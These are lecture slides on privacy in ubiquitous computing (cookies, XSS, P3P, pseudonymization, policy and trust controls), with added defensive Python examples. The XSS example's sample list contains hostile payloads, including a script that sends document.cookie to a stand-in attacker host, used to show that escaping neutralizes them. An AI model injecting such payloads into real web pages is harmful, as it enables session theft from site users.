Privacy Management in Ubiquitous Computing Environment Jin Zhou Ho Geun An Priyanka Vanjani Kwane E. Welcher.
Summary Introduction (Jin) Internet Privacy (Ho An) Privacy in E-Commerce (Priyanka) Privacy in Ubiquitous Computing (Jin) Policy-Based Control (Kwane) Trust and Reputation (Jin) Conclusion (Jin)

Introduction
Ubiquitous computing promises a world in which computational artifacts embedded in the environment continuously sense our activities and provide services based on what is sensed. It is thought of as the third wave in computing, and it is just beginning.

Scenario

Properties of Ubicomp
Ubiquity / Invisibility / Sensing / Memory Amplification

Privacy Problems

Example Scenario
Alice is visiting a city and uses Bob's location service. Alice's location is stored on Bob's server. Bob may sell Alice's information to Carol.

Fair Information Practices
Notice/Awareness / Choice/Consent / Access/Participation / Integrity/Security / Enforcement/Redress

Internet
The Internet is one of the biggest parts of the ubiquitous computing environment. It is based on an end-user-centric architecture. Benefits: flexibility, generality, openness. Disadvantages: end users have to take care of their own privacy protection, and the Internet is the place where privacy violations occur most often today.

Personal Information on the Internet
Medium: web site / e-mail / IM / chat room / bulletin board / p2p network / voice and video communication
Personal information: name / address / SSN / credit card number / user behavior

Threats
Four factors make it much easier for a data collector to gain personal information. In order to reach the public, one must:
advertise;
use well-known protocols and standards;
reveal one's content;
accept that one may come under the scrutiny of the authorities.

Threats
The widely used protocols (e.g. TCP/IP, HTTP, DNS) and the applications built on them provide no built-in protection for privacy. Exploiting these factors, data collectors gather personal information over the network without notice or consent. Several data stores and data flows on the network contain personal information and are targeted by data collectors: DNS, URLs, cookies and scripting.

DNS Server
A DNS server resolves the host names found in Uniform Resource Locators (URLs) into numeric Internet addresses [RFC1035]. Because the protocol gives no assurance that replies from a DNS server are genuine and have not been tampered with, DNS spoofing can send users to an attacker's host and extract sensitive information from them. Structural remedies for these DNS vulnerabilities exist but are not widely deployed: the Domain Name System Security Extensions [RFC2065] (DNSSEC; RFC 2065 has since been superseded by RFCs 4033 to 4035).

URL Leak
The URL “ &form_id=xxx&pass=xxx” carries the user ID and password in its query string. Referenced URLs leak in many ways: browser history, the Referer header, and server and proxy logs. Solution: HTTPS. Note that HTTPS only hides the URL from eavesdroppers on the wire; the URL still lands in browser history, in server logs and in the Referer header sent to other HTTPS sites, so credentials should not be placed in URLs at all.

Cookie Exposure
A cookie is a small piece of data that a web server gives to a web browser and that the browser returns on later requests to that server. Its main purpose is to identify users and, possibly, prepare customized web pages for them. Cookies are used in basically two ways: tracking users and authenticating users. Unfortunately, there is no standard mechanism that lets a server establish the integrity of a cookie returned by a browser: a server that trusts a plain `user=alice` cookie is trusting whatever the client chooses to send. For end users, the best defence is to avoid shopping online or registering with online services that use unsafe cookie-based authentication; on the server side, cookie values must be unguessable or integrity-protected and should carry the Secure and HttpOnly attributes.
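The slide's point that a browser-returned cookie has no built-in integrity is easiest to see with code. The following is an added example in Python, not code from the slides: a cookie value that carries an HMAC tag over the user identity, so that the same edit an attacker makes to a plain `user=alice` cookie (rewriting it to `admin`) is rejected. The key name `SERVER_KEY`, the helper names and the `sid` cookie name are assumptions for the demo.

```python
import base64
import binascii
import hashlib
import hmac

# Hypothetical server-side secret for the demo; load it from a secret store in practice.
SERVER_KEY = b"constructed-demo-key-do-not-reuse"


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_session_cookie(user_id: str, key: bytes = SERVER_KEY) -> str:
    """Integrity-protected cookie value: base64url(user_id) '.' hex(HMAC-SHA256(key, user_id)).

    A plain 'user=alice' cookie can be edited to 'user=admin' in the browser; here any
    change to the payload invalidates the tag, and the key never leaves the server."""
    payload = user_id.encode("utf-8")
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return f"{_b64(payload)}.{tag}"


def verify_session_cookie(value: str, key: bytes = SERVER_KEY):
    """Return the user id carried by `value`, or None if the cookie is malformed or forged."""
    try:
        encoded, tag = value.split(".", 1)
        payload = _unb64(encoded)
        user_id = payload.decode("utf-8")
    except (ValueError, binascii.Error, UnicodeDecodeError):
        return None
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest()
    # Constant-time comparison so the tag cannot be guessed byte by byte via timing.
    if not hmac.compare_digest(expected, tag):
        return None
    return user_id


def tamper(value: str, new_user_id: str) -> str:
    """What an attacker can do to any cookie: rewrite the identity and keep the old tag."""
    _, tag = value.split(".", 1)
    return f"{_b64(new_user_id.encode('utf-8'))}.{tag}"


def set_cookie_header(name: str, value: str) -> str:
    """Set-Cookie with the attributes that limit exposure: Secure (sent over HTTPS only),
    HttpOnly (not readable by page script, so an XSS cannot exfiltrate it) and
    SameSite=Lax (not attached to cross-site POSTs)."""
    return f"Set-Cookie: {name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    cookie = make_session_cookie("alice")
    print(set_cookie_header("sid", cookie))
    print("genuine ->", verify_session_cookie(cookie))
    print("forged  ->", verify_session_cookie(tamper(cookie, "admin")))
```

The cookie still carries only an identifier, in line with the RFC 2964 recommendation below that session information itself not contain sensitive data; an equally valid alternative is a long random session ID looked up in server-side state, which leaks nothing even if the cookie is read.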

Recommends
[RFC2964] recommends proper use of cookies:
1. The user is aware that a cookie is being maintained and consents to it.
2. The user has the ability to delete the cookie associated with such a session at any time.
3. The information obtained through the cookies is not disclosed to other parties without the user's explicit consent.
4. The session information itself does not contain sensitive information and cannot be used to obtain sensitive information.

Cross-Site Scripting (XSS; abbreviated CSS in the original slides)
XSS is a type of security vulnerability, typically found in web applications, that allows malicious users to inject client-side script (JavaScript or HTML) or ActiveX controls into web pages, messages, instant messages, newsgroup postings or other media. Victim users may execute the script without noticing. An XSS vulnerability can be used to collect HTTP cookies or the URL history and send the data to an unauthorized party.

Prevent XSS
Web developers must encode user-supplied data before re-displaying it: all non-alphanumeric client-supplied data (which may contain malicious script) should be converted to HTML character entities before being re-displayed to other clients, using the encoding appropriate to where the data is inserted (element text, attribute value, URL or script). For end users, the most effective way to prevent XSS attacks is to disable scripting in their web browsers. They should be careful about clicking links on untrusted web pages or in e-mails, and should not install ActiveX controls from untrusted web sites.
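To make the "convert to HTML character entities before re-displaying" rule concrete, here is an added Python example (not from the slides) that renders a comment into a page fragment twice, once by pasting the text in as-is and once after entity-encoding it, and checks whether the user input changed the page structure. The comment form, the template and the four sample submissions are constructed for the demo.

```python
import html

# Constructed sample submissions to a comment form: one benign, three hostile.
SAMPLE_COMMENTS = [
    "Nice site!",
    "<script>new Image().src='https://evil.example/c?'+document.cookie</script>",
    '" onmouseover="alert(document.cookie)',
    "<img src=x onerror=alert(1)>",
]

# The fragment the server builds; user text lands in an attribute AND in element text.
PAGE_TEMPLATE = '<p class="comment" title="{title}">{body}</p>'
TEMPLATE_TAGS = PAGE_TEMPLATE.count("<")     # 2: <p ...> and </p>
TEMPLATE_QUOTES = PAGE_TEMPLATE.count('"')   # 4: around the class and title values


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: the comment is pasted into the markup as-is (what the slide warns against)."""
    return PAGE_TEMPLATE.format(title=comment, body=comment)


def escape_html(text: str) -> str:
    """Entity-encode the characters that change meaning in HTML text and quoted attributes:
    & < > become &amp; &lt; &gt;, and quote=True also encodes " and ' so a value cannot
    close the attribute it sits in. This is output encoding at render time, not input filtering."""
    return html.escape(text, quote=True)


def render_comment_safe(comment: str) -> str:
    """Hardened: every user-controlled value is escaped for the context it is inserted into."""
    return PAGE_TEMPLATE.format(title=escape_html(comment), body=escape_html(comment))


def breaks_out(markup: str) -> bool:
    """True if the rendered fragment has more tags or attribute quotes than the template,
    i.e. the user input altered the page structure instead of staying inert text."""
    return markup.count("<") > TEMPLATE_TAGS or markup.count('"') > TEMPLATE_QUOTES


if __name__ == "__main__":
    for comment in SAMPLE_COMMENTS:
        print(f"unsafe breaks out: {str(breaks_out(render_comment_unsafe(comment))):5}  "
              f"safe breaks out: {str(breaks_out(render_comment_safe(comment))):5}  <- {comment[:40]}")
```

`breaks_out` is only a demonstration check, not a sanitizer. The encoding shown is correct for element text and quoted attribute values; data placed into an `href`/`src` URL or inside a `<script>` block needs the encoder for that context, and a Content-Security-Policy header limits what an injected script can do if encoding is missed somewhere.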

Addressing Privacy in E-Commerce
E-Commerce: business conducted over the Internet using any of the applications that rely on it, such as e-mail, web services and online shopping.

Data
Implicit: personalization data inferred from the user's behaviour.
Explicit: demographics, ratings or other information the user provides directly.

Privacy Risks
Users fear that their information might be shared with other organizations and/or companies.
Fear of undesired marketing.
Users are concerned about how the information they have provided will be used.
Risk that a website is not run by a trusted organization, and of the information being stored in its database.
Information might be distributed to other unwanted websites or used by other organizations.
Fear of online activities being tracked.

User Concerns
Most users do not care much about factors such as whether a site has a privacy policy posted, whether it has a data retention policy, or whether it has a privacy seal. This is because they are not well aware of the importance of these factors.

Protecting Privacy: P3P
One of the solutions for protecting privacy in e-commerce. It enables websites to express their privacy practices in a standard, machine-readable format that user agents can conveniently retrieve and interpret.

HTTP Transaction with P3P added

Summary of P3P
P3P is not an enforcement mechanism; it facilitates better communication. Goal of the P3P 1.0 specification: to make user agents aware of the practices that websites follow when collecting data.

TRUSTe
TRUSTe certifies and monitors websites' privacy policies and also aims at resolving consumer privacy problems. TRUSTe developed the first online privacy seal program and the TRUSTe Watchdog, an alternative dispute resolution mechanism that lets you report a privacy violation by an accredited site directly to TRUSTe via the web.

Conclusion of E-Commerce Privacy
Users today have strong opinions about online privacy and tend to make their own assumptions about data collection, and those assumptions turn out to be quite unfavorable. More concrete and reliable data about e-commerce and privacy technologies is vital in order to improve them, win users' trust and meet their expectations.

Privacy in Ubicomp Environment
Principle of Minimum Asymmetry / Anonymization and Pseudonymization / P3P / PawS / Wearable / Other Mechanisms

Principle of Asymmetry
Negative externalities are often much harder to overcome in environments with significant asymmetry in both information and power between the parties. Principle of Minimum Asymmetry:
decrease the flow of information from data owners to data collectors and users;
increase the flow of information from data collectors and users back to data owners.

Principle of Minimum Asymmetry

Approximate Information Flow
Information Spaces (storage perspective)
Data Lifecycle (dataflow perspective)
Themes for minimizing asymmetry (end-user perspective)

Information Spaces
Boundaries: physical, social, activity-based
Properties: lifetime, accuracy, confidence
Operations: addition/deletion/update; authorization/revocation; promotion/demotion; composition/decomposition; fusion/inference

Data Lifecycle
Collection / Access / Second Use

Themes for Minimizing Asymmetry
Prevention / Avoidance / Detection

Design Space

Anonymization and Pseudonymization
Anonymity precludes associating data or a transaction with a particular person. However, services that require the presence of a user are not possible under full anonymity; in that case pseudonymity is required. With user-selected pseudonyms, users can interact with the environment anonymously under a pseudo-identity. Nevertheless, pseudonymity can be compromised, because the user is physically present and may at times be identified.

P3P
A framework for standardized, machine-readable privacy policies that relieves the time-consuming process of reading policies. A P3P-enabled web browser can decide what to do by comparing a site's policy with the user's stored preferences. Delivered as an XML policy file, or as a compact policy in the HTTP P3P header.

An Example P3P File

Main Content of a Policy
Which information the server stores:
which kind of information is collected (identifying or not);
which particular information is collected (IP number, address, name, etc.).
Use of the collected information:
how this information is used (regular navigation, tracking, personalization, telemarketing, etc.);
who will receive this information (only the current company, third parties, etc.).
Permanence and visibility:
how long the information is stored;
whether and how the user can access the stored information (read-only, opt-in, opt-out).
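The comparison step described in the two P3P slides above (the browser matches a site's policy against the user's stored preferences) is shown here as an added Python example that is not part of the slides. It parses a constructed P3P 1.0 policy, with the PURPOSE, RECIPIENT and RETENTION elements that correspond to the "use", "who receives" and "how long" items listed above, and also the compact form sent in the `P3P: CP=...` HTTP header, then reports every practice the user has blocked. The shop, its policy and the preference set are fictional.

```python
import xml.etree.ElementTree as ET

P3P_NS = "{http://www.w3.org/2002/01/P3Pv1}"

# Constructed P3P 1.0 policy for a fictional shop (element and value names are the spec's).
SAMPLE_POLICY_XML = """<POLICIES xmlns="http://www.w3.org/2002/01/P3Pv1">
  <POLICY name="shop" discuri="https://shop.example/privacy">
    <ENTITY><DATA-GROUP><DATA ref="#business.name">Example Shop</DATA></DATA-GROUP></ENTITY>
    <ACCESS><nonident/></ACCESS>
    <STATEMENT>
      <PURPOSE><current/><admin/><telemarketing required="opt-in"/></PURPOSE>
      <RECIPIENT><ours/><other-recipient/></RECIPIENT>
      <RETENTION><indefinitely/></RETENTION>
      <DATA-GROUP>
        <DATA ref="#user.name"/>
        <DATA ref="#user.home-info.telecom.telephone"/>
        <DATA ref="#dynamic.clickstream"/>
      </DATA-GROUP>
    </STATEMENT>
  </POLICY>
</POLICIES>
"""

# Constructed user preferences: the "stored preferences" the browser compares against.
USER_PREFS = {
    "purposes": {"telemarketing", "individual-analysis", "individual-decision"},
    "recipients": {"other-recipient", "unrelated", "public"},
    "retention": {"indefinitely"},
}

# Compact-policy tokens (HTTP header "P3P: CP=...") mapped to the full-policy vocabulary.
# A trailing a/i/o means always / opt-in / opt-out; no suffix means always.
COMPACT = {
    "purposes": {"CUR": "current", "ADM": "admin", "DEV": "develop", "TAI": "tailoring",
                 "PSA": "pseudo-analysis", "PSD": "pseudo-decision", "IVA": "individual-analysis",
                 "IVD": "individual-decision", "CON": "contact", "TEL": "telemarketing",
                 "OTP": "other-purpose"},
    "recipients": {"OUR": "ours", "DEL": "delivery", "SAM": "same", "OTR": "other-recipient",
                   "UNR": "unrelated", "PUB": "public"},
    "retention": {"NOR": "no-retention", "STP": "stated-purpose", "LEG": "legal-requirement",
                  "BUS": "business-practices", "IND": "indefinitely"},
}
REQ_SUFFIX = {"": "always", "a": "always", "i": "opt-in", "o": "opt-out"}


def statements_from_xml(xml_text):
    """Each STATEMENT -> {'purposes': {name: required}, 'recipients': {...},
    'retention': {...}, 'data': [refs]}; 'required' defaults to 'always' per the spec."""
    out = []
    for st in ET.fromstring(xml_text).iter(P3P_NS + "STATEMENT"):
        def leaves(tag):
            parent = st.find(P3P_NS + tag)
            if parent is None:
                return {}
            return {c.tag[len(P3P_NS):]: c.get("required", "always") for c in parent}
        out.append({"purposes": leaves("PURPOSE"), "recipients": leaves("RECIPIENT"),
                    "retention": leaves("RETENTION"),
                    "data": [d.get("ref") for d in st.iter(P3P_NS + "DATA")]})
    return out


def statements_from_compact(header_value):
    """'CP="CURa TELo OUR OTRa IND"' -> one statement in the same shape (data not itemised)."""
    st = {"purposes": {}, "recipients": {}, "retention": {}, "data": ["(not itemised)"]}
    for tok in header_value.split("=", 1)[1].strip().strip('"').split():
        base, req = tok[:3].upper(), REQ_SUFFIX.get(tok[3:].lower(), "always")
        for field, table in COMPACT.items():
            if base in table:
                st[field][table[base]] = req
    return [st]


def evaluate(statements, prefs):
    """One message per blocked practice. A practice the site marks required="opt-in" is
    not flagged: nothing happens unless the user actively agrees to it."""
    problems = []
    for i, st in enumerate(statements, 1):
        for field in ("purposes", "recipients", "retention"):
            for name, req in st[field].items():
                if name in prefs[field] and req != "opt-in":
                    problems.append(f"statement {i}: {field.rstrip('s')} '{name}' ({req}) on {st['data']}")
    return problems


def evaluate_policy(xml_text, prefs=USER_PREFS):
    return evaluate(statements_from_xml(xml_text), prefs)


def evaluate_compact(header_value, prefs=USER_PREFS):
    return evaluate(statements_from_compact(header_value), prefs)


if __name__ == "__main__":
    for line in evaluate_policy(SAMPLE_POLICY_XML):
        print("full policy:", line)
    for line in evaluate_compact('CP="CAO DSP COR CURa ADMa TELo OUR OTRa IND"'):
        print("compact    :", line)
```

As the "Summary of P3P" slide says, this is communication, not enforcement: the code can only tell the user that the site declares sharing with other recipients and indefinite retention; it cannot verify that the site actually behaves that way.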

Privacy Awareness System (PawS)
Based on Fair Information Practices; focuses mainly on four principles:
Notice: policy announcement mechanisms.
Choice and Consent: machine-readable policies.
Proximity and Locality: access restriction based on location.
Access and Recourse: privacy proxies / privacy-aware databases.

Overview of PawS

Wearable
Instead of putting sensors and cameras in the room, put them on the person. Well suited to providing privacy and personalization. Has trouble with localized information, localized control and resource management.

Other Approaches
Location privacy policy: an individual should be able to adjust the accuracy of his location, identity, time and speed, and so have the power to enforce the need-to-know principle.
Privacy Mirror: provides feedback to end users, showing them what information is being collected, what information has been accessed, and by whom.
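The location privacy policy and Privacy Mirror ideas above, together with the per-service pseudonyms from the "Anonymization and Pseudonymization" slide, fit into one small piece of device-side code. This is an added Python example, not part of the slides: before a location report leaves the user's device it is coarsened to the accuracy the user granted that service, the identity is replaced by an anonymous or per-service pseudonymous one, and the disclosure is recorded in a log the user can inspect. The two service names, the `USER_SECRET` key and the `SERVICE_POLICY` table are assumptions for the demo.

```python
import hashlib
import hmac
import math

# Hypothetical per-user secret held only on the user's device; services never see it.
USER_SECRET = b"constructed-user-secret"

# Need-to-know policy chosen by the user per service (constructed for the demo):
#   cell_deg  - location snapped to a grid of this size (0.01 deg is roughly 1 km)
#   time_s    - timestamps rounded down to this bucket
#   identity  - "anonymous" (no identifier), "pseudonym" (stable per service) or "real"
SERVICE_POLICY = {
    "weather.example":       {"cell_deg": 0.1,   "time_s": 3600, "identity": "anonymous"},
    "friend-finder.example": {"cell_deg": 0.001, "time_s": 60,   "identity": "pseudonym"},
}


def pseudonym(user_id, service, secret=USER_SECRET):
    """Stable per-service pseudonym: one service sees a consistent identity across sessions,
    but two services cannot link their records because the names are unrelated HMAC outputs."""
    mac = hmac.new(secret, f"{service}\x00{user_id}".encode("utf-8"), hashlib.sha256)
    return mac.hexdigest()[:16]


def coarsen_location(lat, lon, cell_deg):
    """Snap a coordinate to the south-west corner of its enclosing grid cell."""
    return (round(math.floor(lat / cell_deg) * cell_deg, 6),
            round(math.floor(lon / cell_deg) * cell_deg, 6))


def coarsen_time(ts, bucket_s):
    """Round a Unix timestamp down to the start of its bucket."""
    return ts - (ts % bucket_s)


def disclose(user_id, service, lat, lon, ts, mirror_log):
    """Build the record actually sent to `service` and append what was disclosed, to whom
    and at what accuracy to the user's own log (the feedback a Privacy Mirror displays).
    Services without an entry in the policy table get nothing (default deny)."""
    if service not in SERVICE_POLICY:
        raise PermissionError(f"no disclosure policy for {service}")
    pol = SERVICE_POLICY[service]
    record = {"lat_lon": coarsen_location(lat, lon, pol["cell_deg"]),
              "time": coarsen_time(ts, pol["time_s"])}
    if pol["identity"] == "pseudonym":
        record["id"] = pseudonym(user_id, service)
    elif pol["identity"] == "real":
        record["id"] = user_id
    mirror_log.append({"to": service, "fields": sorted(record),
                       "cell_deg": pol["cell_deg"], "time_s": pol["time_s"]})
    return record


if __name__ == "__main__":
    log = []
    for svc in SERVICE_POLICY:
        print(svc, "->", disclose("alice", svc, 37.7749, -122.4194, 1700000000, log))
    print("privacy mirror:", log)
```

The asymmetry point from earlier slides is visible in the shape of the code: the service receives less (coarser, pseudonymous data) while the user receives more (a record of every disclosure). Note that coarsening one report is not the whole story; repeated reports from the same pseudonym can still be correlated with a home or workplace, which is the residual risk the pseudonymization slide warns about.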

Policy Based Privacy

Personal Privacy Policies
Policies defined
Personal privacy policy defined
Proposed personal privacy model

Personal Privacy Policy Model

Personal Privacy Policy Content
Model Code for the Protection of Personal Information
Privacy risk analysis questions

Model Code for the Protection of Personal Information: 10 Principles (1 to 5)
1. Accountability
2. Identifying Purpose
3. Consent
4. Limiting Collection
5. Limiting Use, Disclosure, Retention

Model Code for the Protection of Personal Information: 10 Principles (6 to 10)
6. Accuracy
7. Safeguards
8. Openness
9. Individual Access
10. Challenging Compliance

Personal Privacy Policy Sample

Usage Control Policies Usage control policy defined Usage control policy goal

Usage Control Policy Concept

Usage Control Policy Components
Requirements
Obligations: controllable, observable
Compensation actions

Usage Control Policy Components High-level policies Low-level policies

Usage Control Policy Process

Privacy Policy Discussion Personal Privacy Policy + Usage Control Policy + Technological Solutions = Enhanced Privacy in UBICOMP

Trust and Reputation Based Control
People use trust and reputation to manage their privacy. Not all people are untrustworthy: some have a higher reputation, and those we trust more are the ones to whom we are willing to give more private information. Trust networks and a reputation system help users manage how, when and where they share their personal information.

Advantages
Policy-based mechanisms such as P3P and PawS assume that the user maintains only one privacy policy, applicable to all entities. A trust- and reputation-based approach has two advantages: adaptivity and flexibility.

Conclusion
Fair Information Practices should serve as guidelines for designing a ubicomp system. Internet vulnerabilities should also be considered. Minimize asymmetry. Use machine-readable policies. Use a trust- and reputation-based system for information sharing.

Questions?